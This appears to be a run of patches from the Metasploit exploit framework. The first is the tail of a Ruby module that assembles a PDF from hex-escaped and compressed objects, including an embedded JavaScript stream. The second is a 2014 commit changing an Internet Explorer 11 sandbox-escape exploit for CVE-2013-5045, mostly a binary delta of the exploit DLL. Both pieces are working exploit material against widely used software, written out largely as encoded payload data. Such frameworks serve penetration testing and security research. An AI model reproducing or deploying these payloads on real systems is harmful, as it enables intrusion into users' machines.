x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_compressed(25, "eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9") + add_compressed(40, "eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw") + add_compressed(3, "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") + add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo") + add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a") + add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==") + add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6") + add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=") + add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR") + add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD") + add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=") + add_compressed(14, 
"eJzjjTY0VTBQCFKAULG8ABzfA0M=") + add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==") + add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==") + add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA") + add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=") + add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK") + add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==") + add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==") + add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=") + add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==") + add_compressed(30, "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") + add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=") + add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==") + add_compressed(51, 
"eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=") js = Zlib::Deflate.deflate(js) add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d") - add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") - add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") - add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") - add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(39, 
"\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(45, "\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x6
6\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x7
3\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") - add_object(23, 
"\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") + add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==") + add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==") + add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=") + add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=") + add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==") + add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=") + add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==") + add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=") + add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==") + add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=") + add_compressed(45, "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") + add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=") @xref_offset = @pdf.length @pdf << 
xref_table << trailer(25) << startxref
From f918bcc631489e77715ea16e4dfcfa101f005ca7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 3 Jun 2014 09:01:56 -0500
Subject: [PATCH 463/853] Use powershell instead of mshta
---
 data/exploits/CVE-2013-5045/CVE-2013-5045.dll | Bin 166400 -> 166912 bytes
 .../CVE-2013-5045/CVE-2013-5045.cpp | 6 +++---
 .../exploits/IE11SandboxEscapes/make.msbuild | 18 ------------------
 .../local/ms13_097_ie_registry_symlink.rb | 18 ++++--------------
 4 files changed, 7 insertions(+), 35 deletions(-)
 delete mode 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild
diff --git a/data/exploits/CVE-2013-5045/CVE-2013-5045.dll b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll index 3f912623885f6490ea79e3470401177a66f4418e..fd0b378216db3a34123c91d3eaf59bded77cfdeb 100755 GIT binary patch delta 21074 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 
